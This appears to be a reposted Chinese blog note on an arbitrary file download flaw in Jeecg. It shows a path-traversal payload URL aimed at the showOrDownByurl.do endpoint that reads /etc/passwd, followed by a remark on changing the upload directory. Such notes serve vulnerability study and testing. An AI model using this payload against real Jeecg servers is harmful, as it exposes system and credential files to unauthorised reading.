Jeecg 任意文件下载漏洞

其他 2020-02-17 11:16:46 阅读次数: 0

payload:
localhost:8080/jeecg_war/chat/imController/showOrDownByurl.do?dbPath=../../etc/passwd&down=1

它默认的文件路径是D://upFiles，我们部署在linux下把目录改为其他的任意目录，我这里修改为/tmp/uploads

在配置文件中进行修改（/src/main/resources/chat_config.properties)

在这里插入图片描述

灰色世界的阿信

发布了116 篇原创文章 · 获赞 161 · 访问量 42万+

他的留言板关注

猜你喜欢

转载自blog.csdn.net/he_and/article/details/103037565

Jeecg 任意文件下载漏洞

任意文件下载漏洞

【Web漏洞】任意文件下载漏洞

JEECG 通用文件上传

jeecg解析xml文件

1.3 任意文件查看与下载漏洞

任意文件读取下载漏洞

任意文件读取/下载漏洞

Web安全-任意文件下载漏洞

任意文件读取与下载漏洞

渗透测试-任意文件下载漏洞

任意文件读取与下载漏洞学习

web 任意文件下载漏洞

任意文件读取/下载漏洞总结

jeecg

【网络安全 --- 任意文件下载漏洞（1）】任意文件下载漏洞

Jeecg-boot JDBC任意代码执行漏洞

jeecg通用文件上传案例

jeecg随笔-文件下载的ajax交互

Web的基本漏洞--任意文件读取与下载漏洞

任意文件下载

ThinkSnS v4后台任意文件下载漏洞

web_day40_Filter_任意文件下载漏洞

RuoYi 4.5.1 发布，阻止任意文件下载漏洞

Apache Ambari 公布任意文件下载漏洞

jeecg-boot sql注入漏洞解决

JEECG 社区开源项目下载总览

任意文件下载(读取)

【高危】 jeecg-boot/积木报表基于H2驱动的任意代码执行漏洞

【严重】jeecg-boot/积木报表基于SSTI的任意代码执行漏洞

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型

JS实现无缝滚动上

深入解析HashMap原理（基于JDK1.8）

mysql的连接池

关于.htc

linux下的ubuntu12.04图形界面

【数论】好推不好记的扩展欧几里德

设备树详解

cscope + tags 简单设置

xml学习

每日归档

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)